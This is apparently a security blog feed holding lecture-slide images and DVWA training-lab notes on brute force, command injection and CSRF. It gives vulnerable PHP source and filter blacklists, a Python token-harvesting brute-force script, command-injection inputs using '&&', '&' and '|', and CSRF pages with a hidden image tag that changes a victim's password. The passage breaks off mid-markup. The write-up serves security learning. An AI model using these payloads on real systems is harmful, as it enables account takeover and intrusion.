alt="image-20211219160229356" style="zoom:67%;" /><p>Selectors.</p><p><img src="https://s2.loli.net/2022/02/04/tAloZHvfS6DFyTq.png" alt="image-20211219161713558"></p><p>E-mail security protocols</p><ul><li>PEM</li><li>S/MIME</li><li>PGP</li></ul><p><img src="https://s2.loli.net/2022/02/04/ob7WaATp9jD5OBJ.png" alt="image-20211219165020483"></p><p><img src="https://s2.loli.net/2022/02/04/aZBoRKhuwN5xQvr.png" alt="image-20211219181615499"></p><img src="https://s2.loli.net/2022/02/04/TJRdrDHY1jazyQM.png" alt="image-20211219184746390" style="zoom: 50%;" /><img src="https://s2.loli.net/2022/02/04/ONRy2mrbdkYZuIa.png" alt="image-20211219190204120" style="zoom:67%;" /><p><img src="https://s2.loli.net/2022/02/04/mxIhQ7VDeK31Wda.png" alt="image-20211219191438417"></p><img src="https://s2.loli.net/2022/02/04/MpsmP5i9QUWXTA2.png" alt="image-20211219200652506" style="zoom:67%;" /><p>WEP: Wired Equivalent Privacy</p><p>WEP functions:</p><ul><li>Access control</li><li>Data confidentiality</li></ul><img src="https://s2.loli.net/2022/02/04/yu2oqjXaIC6dmQE.png" alt="image-20211220155923021" style="zoom:67%;" /><p><img src="https://s2.loli.net/2022/02/04/HLapO6CK7EF8kUd.png" alt="image-20211220163158572"></p>]]></content>
<categories>
<category> Security </category>
</categories>
</entry>
<entry>
<title>DVWA Lab Notes</title>
<link href="/2022/01/22/DVWA/"/>
<url>/2022/01/22/DVWA/</url>
<content type="html"><![CDATA[<blockquote><p>I went through this once in February; now I am reviewing it.</p></blockquote><h3 id="暴力破解"><a href="#暴力破解" class="headerlink" title="暴力破解"></a>Brute Force</h3><p><strong>1.low</strong></p><p><img src="https://s2.loli.net/2022/01/27/H8ZeliAm4b7Et9B.png" alt="image-20220127105718016"></p><p>Send the request to the Intruder module and crack it there.</p><p><img src="https://s2.loli.net/2022/01/27/szY9CNKSuaX8QB2.png" alt="image-20220127110040408"></p><p>Or log in with a "universal password" (a SQL injection login bypass)</p><p><img src="https://s2.loli.net/2022/01/27/93df8gNjkeHr7bF.png" alt="image-20220127110633591"></p><p><strong>2.medium</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>( <span class="keyword">isset</span>( <span class="variable">$_GET</span>[ <span class="string">'Login'</span> ] ) ) 
{</span><br><span class="line"> <span class="comment">// Sanitise username input</span></span><br><span class="line"> <span class="variable">$user</span> = <span class="variable">$_GET</span>[ <span class="string">'username'</span> ];</span><br><span class="line"> <span class="variable">$user</span> = <span class="title function_ invoke__">mysql_real_escape_string</span>( <span class="variable">$user</span> );</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Sanitise password input</span></span><br><span class="line"> <span class="variable">$pass</span> = <span class="variable">$_GET</span>[ <span class="string">'password'</span> ];</span><br><span class="line"> <span class="variable">$pass</span> = <span class="title function_ invoke__">mysql_real_escape_string</span>( <span class="variable">$pass</span> );</span><br><span class="line"> <span class="variable">$pass</span> = <span class="title function_ invoke__">md5</span>( <span class="variable">$pass</span> );</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Check the database</span></span><br><span class="line"> <span class="variable">$query</span> = <span class="string">"SELECT * FROM `users` WHERE user = '<span class="subst">$user</span>' AND password = '<span class="subst">$pass</span>';"</span>;</span><br><span class="line"> <span class="variable">$result</span> = <span class="title function_ invoke__">mysql_query</span>( <span class="variable">$query</span> ) <span class="keyword">or</span> <span class="keyword">die</span>( <span class="string">'<pre>'</span> . <span class="title function_ invoke__">mysql_error</span>() . 
<span class="string">'</pre>'</span> );</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$result</span> && <span class="title function_ invoke__">mysql_num_rows</span>( <span class="variable">$result</span> ) == <span class="number">1</span> ) {</span><br><span class="line"> <span class="comment">// Get users details</span></span><br><span class="line"> <span class="variable">$avatar</span> = <span class="title function_ invoke__">mysql_result</span>( <span class="variable">$result</span>, <span class="number">0</span>, <span class="string">"avatar"</span> );</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Login successful</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<p>Welcome to the password protected area <span class="subst">{$user}</span></p>"</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<img src=\"<span class="subst">{$avatar}</span>\" />"</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> {</span><br><span class="line"> <span class="comment">// Login failed</span></span><br><span class="line"> <span class="title function_ invoke__">sleep</span>( <span class="number">2</span> );</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<pre><br />Username and/or password incorrect.</pre>"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="title function_ invoke__">mysql_close</span>();</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="meta">?></span> </span><br></pre></td></tr></table></figure><p><img src="https://s2.loli.net/2022/01/27/TDGXZRB9kpgJq14.png" alt="image-20220127111122668"></p><p>This function (mysql_real_escape_string) escapes special characters, so the universal password no longer works and only brute force remains.</p><p><strong>3.high</strong></p><figure 
class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Check Anti-CSRF token</span></span><br><span class="line"><span class="title function_ invoke__">checkToken</span>( <span class="variable">$_REQUEST</span>[ <span class="string">'user_token'</span> ], <span class="variable">$_SESSION</span>[ <span class="string">'session_token'</span> ], <span class="string">'index.php'</span> );</span><br></pre></td></tr></table></figure><p>The token is simply appended to the URL.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://150.158.167.184:81/vulnerabilities/brute/?username=admin&password=password&Login=Login&user_token=2f7c77f2d6684f968502e34a49b71c39#</span><br></pre></td></tr></table></figure><p>Use a script to brute-force it</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span 
class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> bs4 <span class="keyword">import</span> BeautifulSoup</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">header={</span><br><span class="line"> <span class="string">'GET'</span>: <span class="string">'http://150.158.167.184:81/vulnerabilities/brute/ HTTP/1.1'</span>,</span><br><span class="line"> <span class="string">'User-Agent'</span>:<span class="string">'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0'</span>,</span><br><span class="line"> <span class="string">'Accept'</span>:<span class="string">'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'</span>,</span><br><span class="line"> <span class="string">'Accept-Language'</span>:<span class="string">'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2'</span>,</span><br><span class="line"> <span class="string">'Referer'</span>:<span class="string">'http://150.158.167.184:81/vulnerabilities/brute/'</span>,</span><br><span class="line"> <span class="string">'cookie'</span>:<span class="string">'PHPSESSID=ukih93al6mi9q6sghlo6oo5h90; security=high'</span>,</span><br><span class="line"> <span class="string">'Connection'</span>:<span class="string">'keep-alive'</span>,</span><br><span class="line"> <span class="string">'Upgrade-Insecure-Requests'</span>:<span class="string">'1'</span>,</span><br><span class="line"> <span class="string">'Host'</span>:<span class="string">'127.0.0.1'</span></span><br><span class="line"> }</span><br><span class="line">requrl=<span class="string">"http://150.158.167.184:81/vulnerabilities/brute/"</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span 
class="keyword">def</span> <span class="title function_">get_token</span>(<span class="params">requrl,header</span>):</span><br><span class="line"> response=requests.get(url=requrl,headers=header)</span><br><span class="line"> <span class="built_in">print</span> (response.status_code,<span class="built_in">len</span>(response.content))</span><br><span class="line"> soup=BeautifulSoup(response.text,<span class="string">"html.parser"</span>)</span><br><span class="line"> <span class="built_in">input</span>=soup.form.select(<span class="string">"input[type='hidden']"</span>) <span class="comment"># returns a list</span></span><br><span class="line"> user_token=<span class="built_in">input</span>[<span class="number">0</span>][<span class="string">'value'</span>] <span class="comment"># get the user's token</span></span><br><span class="line"> <span class="keyword">return</span> user_token</span><br><span class="line"></span><br><span class="line">user_token=get_token(requrl,header)</span><br><span class="line">i=<span class="number">0</span></span><br><span class="line"><span class="keyword">for</span> line <span class="keyword">in</span> <span class="built_in">open</span>(<span class="string">"password.txt"</span>):</span><br><span class="line"> requrl=<span class="string">"http://150.158.167.184:81/vulnerabilities/brute/?username=admin&password="</span>+line.strip()+<span class="string">"&Login=Login&user_token="</span>+user_token</span><br><span class="line"> i=i+<span class="number">1</span></span><br><span class="line"> <span class="built_in">print</span> (i , <span class="string">'admin'</span> ,line.strip(),end=<span class="string">" "</span>)</span><br><span class="line"> user_token=get_token(requrl,header)</span><br><span class="line"> <span class="comment"># number of attempts</span></span><br><span class="line"> <span class="keyword">if</span>(i==<span class="number">20</span>):</span><br><span class="line"> <span 
class="keyword">break</span></span><br></pre></td></tr></table></figure><p><img src="https://s2.loli.net/2022/01/27/A4ROEJq7lrXxk1w.png" alt="image-20220127114525285"></p><h3 id="命令注入"><a href="#命令注入" class="headerlink" title="命令注入"></a>Command Injection</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>( <span class="keyword">isset</span>( <span class="variable">$_POST</span>[ <span class="string">'Submit'</span> ] ) ) {</span><br><span class="line"> <span class="comment">// Get input</span></span><br><span class="line"> <span class="variable">$target</span> = <span class="variable">$_REQUEST</span>[ <span class="string">'ip'</span> ];</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Determine OS and execute the ping command.</span></span><br><span class="line"> <span class="keyword">if</span>( <span class="title function_ invoke__">stristr</span>( <span class="title function_ invoke__">php_uname</span>( <span class="string">'s'</span> ), <span class="string">'Windows NT'</span> ) ) {</span><br><span class="line"> <span class="comment">// 
Windows</span></span><br><span class="line"> <span class="variable">$cmd</span> = <span class="title function_ invoke__">shell_exec</span>( <span class="string">'ping '</span> . <span class="variable">$target</span> );</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> {</span><br><span class="line"> <span class="comment">// *nix</span></span><br><span class="line"> <span class="variable">$cmd</span> = <span class="title function_ invoke__">shell_exec</span>( <span class="string">'ping -c 4 '</span> . <span class="variable">$target</span> );</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Feedback for the end user</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<pre><span class="subst">{$cmd}</span></pre>"</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p><strong>1.Low</strong></p><p>There is no protection at all; a command can be executed directly: <code>127.0.0.1 && ipconfig</code></p><p><strong>2.medium</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">command1 && command2 runs command1 first and, if it succeeds, then runs command2.</span><br><span class="line">command1 || command2 runs command1 first and runs command2 only if it fails; if command1 succeeds, command2 is not run.</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span 
class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">1. The ";" separator</span><br><span class="line">Commands separated by a semicolon run in order; even if a command in the middle is used incorrectly and prints an error, the later commands still run. For example:</span><br><span class="line"></span><br><span class="line">Input: command A; command B; command C</span><br><span class="line"></span><br><span class="line">A, B and C run in order; if B is invoked incorrectly, the terminal prints an error and then continues with C.</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">2. The "&&" separator</span><br><span class="line">Like the logical "&&" operator in C and C++: once a command fails, the remaining commands do not run. For example:</span><br><span class="line"></span><br><span class="line">Input: command A && command B && command C</span><br><span class="line"></span><br><span class="line">A runs first; if A succeeds, B runs. If B fails, execution stops and C is never run.</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">3. The "||" separator</span><br><span class="line">Like the logical "||" operator in C and C++: once a command succeeds, the remaining commands do not run. For example:</span><br><span class="line"></span><br><span class="line">Input: command A || command B || command C</span><br><span class="line"></span><br><span class="line">A runs first; if A fails, B runs. If B succeeds, execution stops and C is never run.</span><br></pre></td></tr></table></figure><p>A blacklist filters out the '&&' and ';' command connectors.</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Set blacklist</span></span><br><span class="line"><span class="variable">$substitutions</span> = <span class="keyword">array</span>(</span><br><span class="line"> <span 
class="string">'&&'</span> => <span class="string">''</span>,</span><br><span class="line"> <span class="string">';'</span> => <span class="string">''</span>,</span><br><span class="line">);</span><br></pre></td></tr></table></figure><p>In this case command injection is still possible using a single '&'.</p><p><img src="https://s2.loli.net/2022/01/22/TYoIfNFdB2n7DgJ.png" alt="image-20220122114355231"></p><p><strong>3.high</strong></p><p>Many symbols are now blacklisted</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Set blacklist</span></span><br><span class="line"><span class="variable">$substitutions</span> = <span class="keyword">array</span>(</span><br><span class="line"> <span class="string">'&'</span> => <span class="string">''</span>,</span><br><span class="line"> <span class="string">';'</span> => <span class="string">''</span>,</span><br><span class="line"> <span class="string">'| '</span> => <span class="string">''</span>,</span><br><span class="line"> <span class="string">'-'</span> => <span class="string">''</span>,</span><br><span class="line"> <span class="string">'$'</span> => <span class="string">''</span>,</span><br><span class="line"> <span class="string">'('</span> => <span class="string">''</span>,</span><br><span class="line"> <span class="string">')'</span> => <span class="string">''</span>,</span><br><span class="line"> <span class="string">'`'</span> => <span class="string">''</span>,</span><br><span class="line"> <span class="string">'||'</span> => <span class="string">''</span>,</span><br><span 
class="line">);</span><br></pre></td></tr></table></figure><p>But there is one detail: the entry '| ' has a trailing space, so only a pipe followed by a space is filtered; command injection is still possible with a '|' that has no space after it.</p><p><strong>4.impossible</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Get input</span></span><br><span class="line"><span class="variable">$target</span> = <span class="variable">$_REQUEST</span>[ <span class="string">'ip'</span> ];</span><br><span class="line"><span class="variable">$target</span> = <span class="title function_ invoke__">stripslashes</span>( <span class="variable">$target</span> );</span><br><span class="line"></span><br><span class="line"><span class="comment">// Split the IP into 4 octects</span></span><br><span class="line"><span class="variable">$octet</span> = <span class="title function_ invoke__">explode</span>( <span class="string">"."</span>, <span class="variable">$target</span> );</span><br><span class="line"></span><br><span class="line"><span class="comment">// Check IF each octet is an integer</span></span><br><span class="line"><span class="keyword">if</span>( ( <span class="title function_ invoke__">is_numeric</span>( <span class="variable">$octet</span>[<span class="number">0</span>] ) ) && ( <span class="title function_ invoke__">is_numeric</span>( <span 
class="variable">$octet</span>[<span class="number">1</span>] ) ) && ( <span class="title function_ invoke__">is_numeric</span>( <span class="variable">$octet</span>[<span class="number">2</span>] ) ) && ( <span class="title function_ invoke__">is_numeric</span>( <span class="variable">$octet</span>[<span class="number">3</span>] ) ) && ( <span class="title function_ invoke__">sizeof</span>( <span class="variable">$octet</span> ) == <span class="number">4</span> ) ) {</span><br><span class="line"> <span class="comment">// If all 4 octets are int's put the IP back together.</span></span><br><span class="line"> <span class="variable">$target</span> = <span class="variable">$octet</span>[<span class="number">0</span>] . <span class="string">'.'</span> . <span class="variable">$octet</span>[<span class="number">1</span>] . <span class="string">'.'</span> . <span class="variable">$octet</span>[<span class="number">2</span>] . <span class="string">'.'</span> . <span class="variable">$octet</span>[<span class="number">3</span>];</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Determine OS and execute the ping command.</span></span><br><span class="line"> <span class="keyword">if</span>( <span class="title function_ invoke__">stristr</span>( <span class="title function_ invoke__">php_uname</span>( <span class="string">'s'</span> ), <span class="string">'Windows NT'</span> ) ) {</span><br><span class="line"> <span class="comment">// Windows</span></span><br><span class="line"> <span class="variable">$cmd</span> = <span class="title function_ invoke__">shell_exec</span>( <span class="string">'ping '</span> . 
<span class="variable">$target</span> );</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> {</span><br><span class="line"> <span class="comment">// *nix</span></span><br><span class="line"> <span class="variable">$cmd</span> = <span class="title function_ invoke__">shell_exec</span>( <span class="string">'ping -c 4 '</span> . <span class="variable">$target</span> );</span><br><span class="line"> }</span><br></pre></td></tr></table></figure><p>The impossible level is the defence: the IP address is split into its four octets and each one is checked to be numeric, which rules out command injection at the logical level.</p><h3 id="CSRF"><a href="#CSRF" class="headerlink" title="CSRF"></a>CSRF</h3><p><img src="https://s2.loli.net/2022/01/22/nbIjUsiz54XtHyx.jpg" alt="img"></p><p>Principle: the attacker uses the target user's identity to perform unauthorized operations in that user's name</p><ul><li>The target user is already logged in to the site and can perform its operations</li><li>The target user visits a URL crafted by the attacker</li></ul><p>The source code is as follows:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="meta"><?php</span></span><br><span 
class="line"></span><br><span class="line"><span class="keyword">if</span>( <span class="keyword">isset</span>( <span class="variable">$_GET</span>[ <span class="string">'Change'</span> ] ) ) {</span><br><span class="line"> <span class="comment">// Get input</span></span><br><span class="line"> <span class="variable">$pass_new</span> = <span class="variable">$_GET</span>[ <span class="string">'password_new'</span> ];</span><br><span class="line"> <span class="variable">$pass_conf</span> = <span class="variable">$_GET</span>[ <span class="string">'password_conf'</span> ];</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Do the passwords match?</span></span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$pass_new</span> == <span class="variable">$pass_conf</span> ) {</span><br><span class="line"> <span class="comment">// They do!</span></span><br><span class="line"> <span class="variable">$pass_new</span> = ((<span class="keyword">isset</span>(<span class="variable">$GLOBALS</span>[<span class="string">"___mysqli_ston"</span>]) && <span class="title function_ invoke__">is_object</span>(<span class="variable">$GLOBALS</span>[<span class="string">"___mysqli_ston"</span>])) ? <span class="title function_ invoke__">mysqli_real_escape_string</span>(<span class="variable">$GLOBALS</span>[<span class="string">"___mysqli_ston"</span>], <span class="variable">$pass_new</span> ) : ((<span class="title function_ invoke__">trigger_error</span>(<span class="string">"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work."</span>, E_USER_ERROR)) ? 
<span class="string">""</span> : <span class="string">""</span>));</span><br><span class="line"> <span class="variable">$pass_new</span> = <span class="title function_ invoke__">md5</span>( <span class="variable">$pass_new</span> );</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Update the database</span></span><br><span class="line"> <span class="variable">$insert</span> = <span class="string">"UPDATE `users` SET password = '<span class="subst">$pass_new</span>' WHERE user = '"</span> . <span class="title function_ invoke__">dvwaCurrentUser</span>() . <span class="string">"';"</span>;</span><br><span class="line"> <span class="variable">$result</span> = <span class="title function_ invoke__">mysqli_query</span>(<span class="variable">$GLOBALS</span>[<span class="string">"___mysqli_ston"</span>], <span class="variable">$insert</span> ) <span class="keyword">or</span> <span class="keyword">die</span>( <span class="string">'<pre>'</span> . ((<span class="title function_ invoke__">is_object</span>(<span class="variable">$GLOBALS</span>[<span class="string">"___mysqli_ston"</span>])) ? <span class="title function_ invoke__">mysqli_error</span>(<span class="variable">$GLOBALS</span>[<span class="string">"___mysqli_ston"</span>]) : ((<span class="variable">$___mysqli_res</span> = <span class="title function_ invoke__">mysqli_connect_error</span>()) ? <span class="variable">$___mysqli_res</span> : <span class="literal">false</span>)) . 
<span class="string">'</pre>'</span> );</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Feedback for the user</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<pre>Password Changed.</pre>"</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> {</span><br><span class="line"> <span class="comment">// Issue with passwords matching</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<pre>Passwords did not match.</pre>"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> ((<span class="title function_ invoke__">is_null</span>(<span class="variable">$___mysqli_res</span> = <span class="title function_ invoke__">mysqli_close</span>(<span class="variable">$GLOBALS</span>[<span class="string">"___mysqli_ston"</span>]))) ? <span class="literal">false</span> : <span class="variable">$___mysqli_res</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p><strong>1.low</strong></p><p>There is no protection at all; the password can be changed directly through the URL. A "short link" combined with social engineering can lure the victim into clicking the link, which changes their password.</p><p>Online short-link generator: <a href="http://tool.chinaz.com/tools/dwz.aspx">http://tool.chinaz.com/tools/dwz.aspx</a></p><p><code>password_new=123&password_conf=123&Change=Change#</code></p><p>The link can also be disguised inside a malicious web page to trick the victim</p><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">h1</span>></span>404<span class="tag"></<span class="name">h1</span>></span></span><br><span class="line"></span><br><span class="line"><span class="tag"><<span class="name">a</span> <span class="attr">href</span>=<span 
class="string">"http://49.232.78.252:81/vulnerabilities/csrf/?password_new=hack&password_conf=hack&Change=Change#"</span>></span>W3School<span class="tag"></<span class="name">a</span>></span></span><br><span class="line"><span class="tag"><<span class="name">h2</span>></span>file not found.<span class="tag"></<span class="name">h2</span>></span></span><br></pre></td></tr></table></figure><p><img src="https://s2.loli.net/2022/01/22/OjBAm5R8tiwXnZr.png" alt="image-20220122223437202"></p><p>Once the victim opens the link, the password has been changed.</p><p>Another attack method found online:</p><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">img</span> <span class="attr">src</span>=<span class="string">"http://192.168.50.100/dvwa/vulnerabilities/csrf/?password_new=hack&password_conf=</span></span></span><br><span class="line"><span class="string"><span class="tag">hack&Change=Change#"</span> <span class="attr">border</span>=<span class="string">"0"</span> <span class="attr">style</span>=<span class="string">"display:none;"</span>/></span></span><br></pre></td></tr></table></figure><p>Just opening the web page file is enough; no link has to be clicked. However, several attempts at this did not succeed.</p><p><strong>2.medium</strong></p><p><img src="https://s2.loli.net/2022/01/22/dFcy4R35UlPAQhL.png" alt="image-20220122214135985"></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">// Checks to see where the request came <span class="keyword">from</span></span><br><span class="line"><span class="keyword">if</span>( stripos( $_SERVER[ <span class="string">'HTTP_REFERER'</span> ] ,$_SERVER[ <span class="string">'SERVER_NAME'</span> ]) !== false ) {</span><br><span class="line"> // Get <span class="built_in">input</span></span><br><span 
class="line"> $pass_new = $_GET[ <span class="string">'password_new'</span> ];</span><br><span class="line"> $pass_conf = $_GET[ <span class="string">'password_conf'</span> ];</span><br></pre></td></tr></table></figure><p>The Referer header is checked</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">GET /vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change HTTP/1.1</span><br><span class="line">Host: 49.232.78.252:81</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><br><span class="line">Connection: close</span><br><span class="line">Referer: http://49.232.78.252:81/vulnerabilities/csrf/</span><br><span class="line">Cookie: PHPSESSID=9mjbjlhio6pup4mq4ne932fbo2; security=medium</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br></pre></td></tr></table></figure><p>After adding the Referer header, the password can be changed successfully</p><p><img src="https://s2.loli.net/2022/01/22/ZP2QKjzx9t3iVHB.png" alt="image-20220122220656993"></p><p>Alternatively, the Referer can be forged to satisfy the check condition</p><p><strong>3.high</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span 
